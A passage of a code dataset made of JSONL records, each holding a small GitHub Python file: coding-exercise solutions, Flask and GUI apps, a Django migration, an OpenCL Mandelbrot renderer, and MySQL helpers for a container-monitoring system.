+{"seq_id":"36337059527","text":"# friend or foe\ndef friend(arr):\n friends = []\n for word in arr:\n if len(word) == 4:\n friends.append(word)\n return friends\n\n# refactor\n# def friend(x):\n# return [f for f in x if len(f) == 4]\n\n# disemvowel trolls\ndef disemvowel(string_):\n for i in \"aeiouAEIOU\":\n string_ = string_.replace(i,\"\")\n return string_\n\n# refactor\n# def disemvowel(string):\n# return \"\".join(c for c in string if c.lower() not in \"aeiou\")\n\n# odd or even\ndef odd_or_even(arr):\n sum = 0\n for n in arr:\n sum += n\n return 'even' if sum % 2 == 0 else 'odd'\n\n# refactor\n# def oddOrEven(arr):\n# return 'even' if sum(arr) % 2 == 0 else 'odd'","repo_name":"pwong09/codewars","sub_path":"python/7kyu.py","file_name":"7kyu.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16924375935","text":"from PyQt5 import QtCore\n\nfrom DyCommon.Ui.DyTableWidget import *\nfrom EventEngine.DyEvent import *\n\n\nclass DyStockTradeCapitalWidget(DyTableWidget):\n \"\"\"\n 股票交易账户资金状况窗口\n !!!券商接口推送的原始数据\n \"\"\"\n signal = QtCore.pyqtSignal(type(DyEvent()))\n\n\n def __init__(self, eventEngine, broker):\n super().__init__(None, True, False)\n\n self._eventEngine = eventEngine\n self._broker = broker\n\n self._headerSet = False\n\n self._registerEvent()\n\n def _signalEmitWrapper(self, event):\n self.signal.emit(event)\n\n def _registerEvent(self):\n self.signal.connect(self._stockCapitalUpdateHandler)\n self._eventEngine.register(DyEventType.stockCapitalUpdate + self._broker, self._signalEmitWrapper)\n self._eventEngine.register(DyEventType.stockCapitalTickUpdate + self._broker, self._signalEmitWrapper)\n\n def _unregisterEvent(self):\n self.signal.disconnect(self._stockCapitalUpdateHandler)\n self._eventEngine.unregister(DyEventType.stockCapitalUpdate + self._broker, self._signalEmitWrapper)\n self._eventEngine.unregister(DyEventType.stockCapitalTickUpdate + self._broker, self._signalEmitWrapper)\n \n def _stockCapitalUpdateHandler(self, event):\n header = event.data['header']\n rows = event.data['rows']\n\n if not self._headerSet:\n self.setColNames(header)\n self._headerSet = True\n\n # strip\n for row in rows:\n if isinstance(row[0], str):\n row[0] = row[0].strip()\n\n self[0] = rows[0]\n\n def closeEvent(self, event):\n self._unregisterEvent()\n\n return super().closeEvent(event)\n","repo_name":"MicroEngine/DevilYuan","sub_path":"Stock/Trade/Ui/Basic/Account/DyStockTradeCapitalWidget.py","file_name":"DyStockTradeCapitalWidget.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"61"}
+{"seq_id":"40143743216","text":"def transposeMatrix(matrix):\n length = len(matrix)\n for i in range(length):\n for j in range(i, length):\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n\n for i in range(length):\n for j in range(length // 2):\n matrix[i][j], matrix[i][length - 1 - j] = matrix[i][length - 1 - j], matrix[i][j]\n\n return matrix\n\n\na = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\nprint(transposeMatrix(a))\n\n\n","repo_name":"guillsav/Technical-Practice","sub_path":"transpose-matrix/transposeMatrix.py","file_name":"transposeMatrix.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4909646955","text":"import PySimpleGUI as sg\n\nfrom DataVisualization.View.DataVisualizationView import *\nfrom DataVisualization.View.DataMergerView import *\nfrom DataVisualization.ViewModel.DataMergerViewModel import DataMergerViewModel\nfrom DataVisualization.ViewModel.DataVisualizationViewModel import *\n\nfrom WindowApp import WindowApp\n\n\nclass DataVisualizationApp(WindowApp):\n def __init__(self, mainAsyncLoop) -> None:\n window = sg.Window(title=\"Data Visualization\", layout=DataVisualizationApp._CreateLayout(),\n margins=(0, 0))\n self.window = window\n viewModels = [\n DataVisualizationViewModel(self),\n DataMergerViewModel(self)\n ]\n\n super().__init__(mainAsyncLoop, window, viewModels)\n\n def _OnAppCloseEvent(self) -> bool:\n choice = \"Yes\"\n self.asyncTaskManager.RemoveIdleTasks()\n if len(self.asyncTaskManager.currentTasks) > 0:\n # Create Popup to notify user that a crawling thread is still active.\n # User can choose to cancel it.\n choice, _ = sg.Window('Cancel Analysis',\n [[sg.T('Analyzer is still actively analyzing, cancel analysis?')],\n [sg.Yes(s=10), sg.No(s=10)]], disable_close=True).read(close=True)\n\n # Default if no thread/task.\n # or when user choose to cancel.\n if choice == \"Yes\":\n self.asyncTaskManager.EndAllTask()\n self.CloseApp()\n return True\n return False\n\n def _CreateLayout():\n # NOTE: App View\n APP_TAB_GROUP = sg.TabGroup(\n [[\n sg.Tab(\"Analyze\", CreateVisualizationViewLayout()),\n sg.Tab(\"Merger\", CreateMergerViewLayout())\n ]]\n )\n\n return [\n [APP_TAB_GROUP]\n ]","repo_name":"wqyeo/ScamDataAnalysis","sub_path":"DataVisualization/DataVisualizationApp.py","file_name":"DataVisualizationApp.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"23451206451","text":"#!/usr/bin/env python3\n\ndef do_testcase():\n S_max, S = input().split()\n S_max = int(S_max)\n S = list(map(int, S))\n invite = total = 0\n for k in range(S_max + 1):\n if total >= S_max:\n break\n if total < k:\n n = k - total\n invite += n\n total += n\n total += S[k]\n else:\n n = S_max - total\n if n > 0:\n invite += S_max - total\n return max(0, invite)\n\nT = int(input())\nfor t in range(1, T + 1):\n result = do_testcase()\n print('Case #{}: {}'.format(t, result))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/2156.py","file_name":"2156.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18022399035","text":"from .selector import Selector\nimport random\nimport numpy as np\n\nclass Curiosity_Driven_Selector(Selector):\n\t\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\n\tdef select(self,container,num_samples):\n\t\t\"\"\"Do a weighted selection based on curiosity scores. container is dict of dicts {\"bin_index\":{\"genome\",\"curiosity\",other details},...}\n\t\tprint a warning if num_samples is more than container size\"\"\"\n\t\tpopulation = []\n\t\tcuriosity = []\n\t\tfor bin_index,bin_value in container.items():\n\t\t\tpopulation.append([bin_index,bin_value])\n\t\t\tcuriosity.append(bin_value[\"curiosity\"])\n\t\tcuriosity = np.array(curiosity)\n\t\t\n\t\tpopulation_size = len(population)\n\n\t\tif(num_samples>population_size):\n\t\t\tself.logger.warning(\"from Curiosity selector- number of samples queried from container exceed it's size,\"+\n\t\t\t \"returning all genomes\")\n\t\t\tnum_samples = population_size\n\t\t\n\t\t#normalise so that it becomes a probbility distribution\n\t\tcuriosity = curiosity/np.sum(curiosity)\n\t\tselected_indices = np.random.choice(a=population_size,size=num_samples,replace=False,p=curiosity)\n\t\treturn [population[index] for index in selected_indices]\n","repo_name":"sandipan1/EVO-RBC","sub_path":"evo_rbc/qd_solver/selector/curiosity_driven_selector.py","file_name":"curiosity_driven_selector.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72672148673","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('blog', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Entry',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('text', models.TextField(verbose_name='Blog entry text')),\n ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created at')),\n ('edited', models.DateTimeField(auto_now=True, verbose_name='Edited at')),\n ('author', models.ForeignKey(verbose_name='Author', to=settings.AUTH_USER_MODEL)),\n ('categories', models.ManyToManyField(to='blog.Category', null=True, verbose_name='Categories', blank=True)),\n ],\n options={\n 'verbose_name_plural': 'Entries',\n },\n bases=(models.Model,),\n ),\n migrations.AlterModelOptions(\n name='category',\n options={'verbose_name_plural': 'Categories'},\n ),\n migrations.AlterField(\n model_name='category',\n name='name',\n field=models.CharField(max_length=255, verbose_name='Category'),\n preserve_default=True,\n ),\n ]\n","repo_name":"Kekc/tardis","sub_path":"blog/migrations/0002_auto_20150116_2226.py","file_name":"0002_auto_20150116_2226.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23139919653","text":"from PIL import Image\n\nimport numpy as np\nimport pyopencl as cl\nimport argparse\nimport PIL\n\nfilename = 'mandelbrot.bmp'\n\nwidth = 768\nheight = 512\n\nmaxIterations = 256\n\nkernelString = \"\"\"\nstatic inline int mandel(float c_re, float c_im, int count) {\n float z_re = c_re, z_im = c_im;\n int i;\n for (i = 0; i < count; ++i) {\n if (z_re * z_re + z_im * z_im > 4.)\n break;\n\n float new_re = z_re*z_re - z_im*z_im;\n float new_im = 2.f * z_re * z_im;\n\n z_re = c_re + new_re;\n z_im = c_im + new_im;\n }\n\n return i;\n}\nkernel void Mandelbrot(\n float x0, float y0,\n float x1, float y1,\n int width, int height,\n int maxIterations,\n global int* output)\n{\n float dx = (x1 - x0) / width;\n float dy = (y1 - y0) / height;\n\n float x = x0 + get_global_id(0) * dx;\n float y = y0 + get_global_id(1) * dy;\n\n int index = get_global_id(1) * width + get_global_id(0);\n output[index] = mandel(x, y, maxIterations);\n}\n\"\"\"\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--platform', type=int, action='store', default=0, help='Platform Index')\n parser.add_argument('-d', '--device', type=int, action='store', default=0, help='Device Index')\n\n args = parser.parse_args()\n platformIndex = args.platform\n deviceIndex = args.device\n\n platforms = cl.get_platforms()\n print('Running on platform: ' + platforms[platformIndex].get_info(cl.platform_info.NAME))\n\n devices = platforms[platformIndex].get_devices()\n print('Running on device: ' + devices[deviceIndex].get_info(cl.device_info.NAME))\n\n context = cl.Context([devices[deviceIndex]])\n commandQueue = cl.CommandQueue(context, devices[deviceIndex])\n\n program = cl.Program(context, kernelString)\n program.build()\n kernel = program.Mandelbrot\n\n deviceMemDst = cl.Buffer(context, cl.mem_flags.ALLOC_HOST_PTR, \n width * height * np.uint32().itemsize)\n\n # execution\n kernel(commandQueue, [width, height], None, \n np.float32(-2.0), np.float32(-1.0), np.float32(1.0), np.float32(1.0),\n np.int32(width), np.int32(height), np.int32(maxIterations), deviceMemDst)\n\n # save bitmap\n mapped_dst, event = cl.enqueue_map_buffer(commandQueue, deviceMemDst,\n cl.map_flags.READ, \n 0, width * height, np.uint32)\n with mapped_dst.base:\n colors = np.fromiter((240 if x & 1 else 20 for x in mapped_dst), np.uint8)\n image = Image.fromarray(colors.reshape((height, width)))\n image.save(filename)\n print('Wrote image file {}'.format(filename))\n","repo_name":"DorofeevKonstantin/4","sub_path":"12-OpenCL/python/mandelbrot.py","file_name":"mandelbrot.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72028469633","text":"\"\"\"\nhttps://blog.csdn.net/weixin_43250623/article/details/88931925\n基准元素,一般来说选取有几种方法:取第一个元素\n\n选择一个基准数,通过一趟排序后,\n将原序列分为两部分,使得前面的比后面的小,\n然后再依次对前后进行拆分进行快速排序,递归该过程,直到序列中所有记录均有序。\n\n\"\"\"\ndef quick_sort(alist, start, end):\n \"\"\"快速排序\"\"\"\n if start >= end: # 递归的退出条件\n return\n mid = alist[start] # !设定起始的基准元素\n i = start # i为序列左边在开始位置的由左向右移动的游标\n j = end # j为序列右边末尾位置的由右向左移动的游标\n while i < j:\n while i < j and alist[j] >= mid:\n # 如果i与j未重合,j(右边)指向的元素大于等于基准元素,则j向左移动\n j -= 1\n alist[i] = alist[j]\n # 走到此位置时j指向一个比基准元素小的元素,将j指向的元素放到i的位置上,\n # 此时j指向的位置空着,接下来移动i找到符合条件的元素放在此处\n\n while i < j and alist[i] <= mid:\n # 如果i与j未重合,i指向的元素比基准元素小,则i向右移动\n i += 1\n alist[j] = alist[i]\n # 此时i指向一个比基准元素大的元素,将i指向的元素放到j空着的位置上,\n # 此时i指向的位置空着,之后进行下一次循环,将j找到符合条件的元素填到此处\n\n # 退出循环后,i与j重合,此时所指位置为基准元素的正确位置,左边的元素都比基准元素小,右边的元素都比基准元素大\n alist[i] = mid # !将基准元素放到位置i=j,因为i已经赋值给其他;是mid不是alist[start]\n # 对基准元素左边的子序列进行快速排序\n quick_sort(alist, start, i - 1) # start :0 i -1 原基准元素靠左边一位\n # 对基准元素右边的子序列进行快速排序\n quick_sort(alist, i + 1, end) # i+1 : 原基准元素靠右一位 end: 最后\n\n\n\nif __name__ == '__main__':\n alist = [54, 26, 93, 17, 77, 31, 44, 55, 20]\n quick_sort(alist, 0, len(alist) - 1)\n print(alist)\n","repo_name":"langdawang678/Py","sub_path":"algorithm/sort_quick.py","file_name":"sort_quick.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40038687952","text":"import time\n\ndef loop_solution(c, n):\n \"\"\"n x c =\n = c + c + c + ...\n :param c:\n :param n:\n :return:\n \"\"\"\n total = 0\n for i in range(n):\n total += c\n # print(i)\n return total\n\n\ndef recursive_solution(c, n):\n \"\"\"n x c =\n = (n - 1) x c + c\n = ((n - 2) x c + c) + c\n = ...\n :param c:\n :param n:\n :return:\n \"\"\"\n # print(n)\n if n == 1:\n return c\n else:\n return recursive_solution(c, n-1) + c\n\n\ndef tail_recursive_solution(c, n, r=0):\n # print(n, r)\n if n == 1:\n return c + r\n else:\n return tail_recursive_solution(c, n-1, c+r)\n\n\ndef good_solution(c, n):\n \"\"\"\n :param c:\n :param n:\n :return:\n \"\"\"\n return c * n\n\n\ndef evaluate_time(sol, title):\n c = 1\n n = 500\n\n print(title)\n time_start = time.time()\n r = sol(c, n)\n time_end = time.time()\n print('result: {}'.format(r))\n print('execution time: {}\\n'.format(time_end - time_start))\n\n\nif __name__ == '__main__':\n evaluate_time(good_solution, 'Good')\n evaluate_time(loop_solution, 'Loop')\n evaluate_time(recursive_solution, 'Recursive')\n evaluate_time(tail_recursive_solution, 'Tail Recursive')\n","repo_name":"wsunccake/myNote","sub_path":"lang/data_structure/recursive/total_c.py","file_name":"total_c.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"70382318276","text":"WIDHT = 900\nHEIGHT = 500 \nFPS = 60\n\nTITLE = 'COWBOY ZOMBIE!'\nBLACK = (0, 0, 0)\nBROWN_LIGHT = (231, 198, 75) \n\nZOMBIE_GRAV = 1.0\n\nSPEED = 5 \nMAX_CACTUS = 10\nMAX_BRAINS = 13\nFONT = 'Arial'\nTEXT_POSTY = 20","repo_name":"Carogirgon/VideoGame","sub_path":"game/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"2477045055","text":"class Solution:\n def numSquares(self, n: int) -> int:\n# solution 1: dp 4000 ms\n# squares = [i**2 for i in range(1, int(n**.5)+1)]\n# dp = [float('inf')] * (n+1)\n# dp[0] = 0\n \n# for i in range(1, n+1):\n# for square in squares:\n# if square > i:\n# break\n# dp[i] = min(dp[i], dp[i-square] + 1)\n# return dp[-1]\n\n# solution 2: greedy algorithm + bfs\n squares = [i**2 for i in range(1, int(n**.5)+1)]\n level = 0\n queue = [n]\n while queue:\n level += 1\n next_queue = set()\n for remainder in queue:\n for square in squares:\n if remainder == square:\n return level\n elif square > remainder:\n break\n else:\n next_queue.add(remainder - square)\n queue = list(tuple(next_queue))\n","repo_name":"OhYoooo/Leetcode","sub_path":"python/279.perfect-squares.py","file_name":"279.perfect-squares.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72687199874","text":"from flask import Flask, app, jsonify, request\r\nimport csv\r\n\r\nall_articles = []\r\nwith open(\"articles.csv\") as f:\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n all_articles = data[1:]\r\n\r\nlike_articles = []\r\nunlike_articles = []\r\napp = Flask(__name__)\r\n@app.route(\"/get-articles\")\r\ndef get_article():\r\n return jsonify({\r\n \"data\": all_articles[0],\r\n \"status\": \"success\"\r\n })\r\n\r\n@app.route(\"/liked-articles\", methods=[\"POST\"])\r\ndef liked_article():\r\n article = all_articles[0]\r\n all_articles = all_articles[1:]\r\n like_articles.append(article)\r\n return jsonify({\r\n \"status\": \"success\"\r\n }), 201\r\n\r\n@app.route(\"/unliked-articles\", methods=[\"POST\"])\r\ndef unliked_article():\r\n article = all_articles[0]\r\n all_articles = all_articles[1:]\r\n unlike_articles.append(article)\r\n return jsonify({\r\n \"status\": \"success\"\r\n }), 201\r\n\r\nif __name__ == \"__main__\":\r\n app.run()","repo_name":"Tp-13/P141","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30619903056","text":"from flask import Flask, render_template, request\nimport jsonify\nimport requests\nimport pickle\nimport numpy as np\nimport sklearn\nfrom sklearn.preprocessing import StandardScaler\napp = Flask(__name__)\nmodel = pickle.load(open('svm.pkl', 'rb'))\n\n\n@app.route('/', methods=['GET'])\ndef Home():\n return render_template('index.html')\n\n\nstandard_to = StandardScaler()\n\n\n@app.route(\"/predict\", methods=['POST'])\ndef predict():\n\n if request.method == 'POST':\n Pregnancies = int(request.form['Pregnancies'])\n Glucose = int(request.form['Glucose'])\n BloodPressure = int(request.form['BloodPressure'])\n DiabetesPedigreeFunction = float(\n request.form['DiabetesPedigreeFunction'])\n SkinThickness = int(request.form['SkinThickness'])\n Insulin = int(request.form['Insulin'])\n BMI = float(request.form['BMI'])\n Age = int(request.form['Age'])\n\n prediction = model.predict(\n [[Pregnancies, Glucose, BloodPressure, DiabetesPedigreeFunction, SkinThickness, Insulin, BMI, Age]])\n print(prediction)\n if prediction[0] == 0:\n return render_template('index.html', prediction_texts=\"The patient does not have diabetes\")\n elif prediction[0] == 1:\n return render_template('index.html', prediction_texts=\"The patient is diagnosed with diabetes\")\n\n else:\n return render_template('index.html')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"deeppudasaini/Diabetes-Prediction-Model","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27079682766","text":"import pyqtgraph.opengl as gl\nimport numpy as np\n\n\nclass RobotArm:\n # ------------------------------\n # Overview\n # ------------------------------\n\n # This will be the class responsible for the following\n # - Adding render of arm to frame\n # - Calculating joint angles\n # - Looking cool\n\n # ------------------------------\n # User Variables\n # ------------------------------\n\n base_joint_height_off_ground = None\n arm_one_length = None\n arm_two_length = None\n paddle_length = None\n distance_from_table = 10 # Inches\n\n # Init method (in inches)\n def __init__(self, base_height, arm1len, arm2len, paddle_len):\n # Set vars\n self.base_joint_height_off_ground = base_height\n self.arm_one_length = arm1len\n self.arm_two_length = arm2len\n self.paddle_length = paddle_len\n\n # Render Creator\n def init_arm(self, w):\n initPoints = np.array([(0, 0, 0), (0, 0, 0)]) # init at 0, 0, 0\n line = gl.GLLinePlotItem(pos=initPoints, width=1)\n w.addItem(line)\n\n return line","repo_name":"ChrisPal323/Ping_Pong_Tracking","sub_path":"robot_arm.py","file_name":"robot_arm.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"18535336366","text":"from pathlib import Path\n\nimport pytest\n\nfrom holdingsparser.application import get_save_path\n\n\ndef test_get_save_path_dir(tmp_path):\n term = \"some_term\"\n file_format = \"dsv\"\n\n result = get_save_path(tmp_path, term, file_format)\n\n assert result == tmp_path / Path(f\"{term}_holdings.{file_format}\")\n\n\ndef test_get_save_path_file(tmp_path):\n term = \"some_term\"\n file_format = \"dsv\"\n file_path = tmp_path / \"some_file\"\n\n result = get_save_path(file_path, term, file_format)\n\n assert result == file_path\n\n\ndef test_get_save_path_missing(tmp_path):\n term = \"some_term\"\n file_format = \"dsv\"\n file_path = tmp_path / \"doesnt_exist\" / \"some_file\"\n\n with pytest.raises(RuntimeError) as e:\n _ = get_save_path(file_path, term, file_format)\n\n assert str(e.value).endswith(\"is an invalid path\")\n","repo_name":"mhadam/holdingsparser","sub_path":"tests/integration/test_application.py","file_name":"test_application.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
+{"seq_id":"9944094937","text":"import dill\nimport logging\nimport mysql.connector\nfrom classes.application import Application\nfrom classes.user import User\nfrom classes.request import Request\nfrom configparser import ConfigParser\nfrom datetime import timedelta, datetime\n\nparser = ConfigParser()\nparser.read('./config/local-config.txt')\n\nif parser['Container']['type'] == 'DOCKER':\n\tfrom classes.container import ContainerDocker as Container\n\nelif parser['Container']['type'] == 'LXC':\n\tfrom classes.container import ContainerLXC as Container\n\n\n# ---------- Database Connection Fuctions ----------\n# Function for connect to global database\n\n\ndef get_connection():\n\tconfig = ConfigParser()\n\tconfig.read('./config/global-config.txt')\n\n\ttry:\n\t\tconn = mysql.connector.connect(host=config['Database']['hostname'],\n\t\t\t\t\t\t\t\t\t\tdatabase=config['Database']['database'],\n\t\t\t\t\t\t\t\t\t\tuser=config['Database']['user'],\n\t\t\t\t\t\t\t\t\t\tpassword=config['Database']['password'])\n\t\treturn conn\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Connection to Database Error: %s', err)\n\n\n# Function for connect to local database\n\n\ndef get_local_connection():\n\tconfig = ConfigParser()\n\tconfig.read('./config/local-config.txt')\n\n\ttry:\n\t\tconn = mysql.connector.connect(host=config['Localbase']['hostname'],\n\t\t\t\t\t\t\t\t\t\tdatabase=config['Localbase']['database'],\n\t\t\t\t\t\t\t\t\t\tuser=config['Localbase']['user'],\n\t\t\t\t\t\t\t\t\t\tpassword=config['Localbase']['password'])\n\t\treturn conn\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Connection to Local Database Error: %s', err)\n\n\n# ---------- Database Publishing Functions ----------\n# Function to save host monitoring data on global database\n\n\ndef publish_host(hostname: str, data):\n\tquery = \"UPDATE host SET hostdata = %s WHERE hostname = %s\"\n\tinfo = (data, hostname)\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\tconn.commit()\n\t\t\tlogging.debug('Host Data %s Updated on Database', hostname)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Publishing Host %s on Database Error: %s', hostname, err)\n\n\n# Function to save container history monitoring data on global database\n\n\ndef publish_container_history(container):\n\tquery = \"INSERT INTO container_history (cid, logdata) VALUES (%s, %s)\"\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\n\t\t\tif not container.state in ['NEW', 'CREATED']:\n\t\t\t\tserial_container = dill.dumps(container)\n\t\t\t\tinfo = (container.cid, serial_container)\n\t\t\t\tcursor.execute(query, info)\n\n\t\t\tconn.commit()\n\t\t\tlogging.debug('%s Container History Data Inserted on Database', container.name)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Publishing Containers History on Database Error: %s', err)\n\n\n# Function to save container history monitoring data on local database\n\n\ndef publish_local_container_history(container: Container):\n\tquery = \"INSERT INTO container_history (name, data) VALUES (%s, %s)\"\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\n\t\t\tif not container.state in ['NEW', 'CREATED']:\n\t\t\t\tserial_container = dill.dumps(container)\n\t\t\t\tinfo = (container.name, serial_container)\n\t\t\t\tcursor.execute(query, 
info)\n\n\t\t\tconn.commit()\n\t\t\tlogging.debug('%s Container History Data Inserted on Local Database', container.name)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Publishing Containers History on Local Database Error: %s', err)\n\n\n# ---------- User Table Functions ----------\n# Function to create a user on global database\n\n\ndef create_user(user: User):\n\tquery = \"INSERT INTO user (login, password, username, usertype) VALUES (%s, password(%s), %s, %s)\"\n\tinfo = (user.login, user.password, user.name, user.type)\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\tconn.commit()\n\t\t\tquery = \"SELECT LAST_INSERT_ID()\"\n\t\t\tcursor.execute(query)\n\t\t\titem = cursor.fetchone()\n\t\t\tuid = item[0]\n\t\t\tlogging.info('User %s Created with the ID %s on Database')\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\t\t\treturn uid\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Creating User %s on Database Error: %s', user.login, err)\n\n\n# Function for login and password check from a user\n\n\ndef check_login(login: str, password: str):\n\tquery = \"SELECT userid FROM user WHERE login = %s AND password = password(%s)\"\n\t#query = \"SELECT IF((SELECT password FROM user WHERE login = %s) = password(%s), True, False)\"\n\tinfo = (login, password)\n\tuid = None\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\titem = cursor.fetchone()\n\n\t\t\tif item:\n\t\t\t\tuid = item[0]\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Login %s Check on Database Error: %s', login, err)\n\n\tfinally:\n\t\tif not uid:\n\t\t\tlogging.info('User Login %s Not Found', login)\n\t\treturn uid\n\n\n# Function to update a user information\n\n\ndef update_user(user: User):\n\tquery = \"UPDATE user SET login = %s, password = %s, username = %s, usertype = %s WHERE userid = %s\"\n\tinfo = (user.login, user.password, user.name, user.type, user.userid)\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\tconn.commit()\n\t\t\tprint('User %s Updated on Database', user.login)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Update User %s Information on Database Error: %s', user.login, err)\n\n\n# ---------- Application Table Functions ----------\n# Function to create an application on global database\n\n\ndef create_application(app: Application):\n\tquery = \"INSERT INTO application (appname, apptype, image, min_memory, num_cores, comments) VALUES (%s, %s, %s, %s, %s, %s)\"\n\tinfo = (app.name, app.type, app.image, app.min_memory, app.num_cores, app.comments)\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\tcursor.commit()\n\t\t\tquery = \"SELECT LAST_INSERT_ID()\"\n\t\t\tcursor.execute(query)\n\t\t\titem = cursor.fetchone()\n\t\t\tappid = item[0]\n\t\t\tlogging.info('Application %s Created on Database', app.name)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\t\t\treturn appid\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Creating Application %s on Database Error: %s', app.name, err)\n\n\n# Function to list the stored applications\n\n\ndef list_applications():\n\tquery = \"SELECT * FROM application\"\n\tapp_list = 
[]\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query)\n\n\t\t\tfor item in cursor:\n\t\t\t\tapp = Application()\n\t\t\t\tapp.appid = item[0]\n\t\t\t\tapp.name = item[1]\n\t\t\t\tapp.type = item[2]\n\t\t\t\tapp.image = item[3]\n\t\t\t\tapp.min_memory = item[4]\n\t\t\t\tapp.num_cores = item[5]\n\t\t\t\tapp.comments = item[6]\n\t\t\t\t# print('Application: ', vars(app))\n\t\t\t\tapp_list.append(app)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Getting Application List on Database Error: %s', err)\n\n\tfinally:\n\t\tif not app_list:\n\t\t\tlogging.info('Not Find any Application on Database')\n\t\treturn app_list\n\n\n# Fuction to get an application information\n\n\ndef get_application_from_ID(appid: int):\n\tquery = \"SELECT * FROM application WHERE id = %s\"\n\tinfo = (appid,)\n\tapplication = Application()\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\titem = cursor.fetchone()\n\n\t\t\tif item:\n\t\t\t\tapplication.appid = item[0]\n\t\t\t\tapplication.name = item[1]\n\t\t\t\tapplication.type = item[2]\n\t\t\t\tapplication.image = item[3]\n\t\t\t\tapplication.min_memory = item[4]\n\t\t\t\tapplication.num_cores = item[5]\n\t\t\t\tapplication.comments = item[6]\n\t\t\t\t# print('Application: ', vars(application))\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept 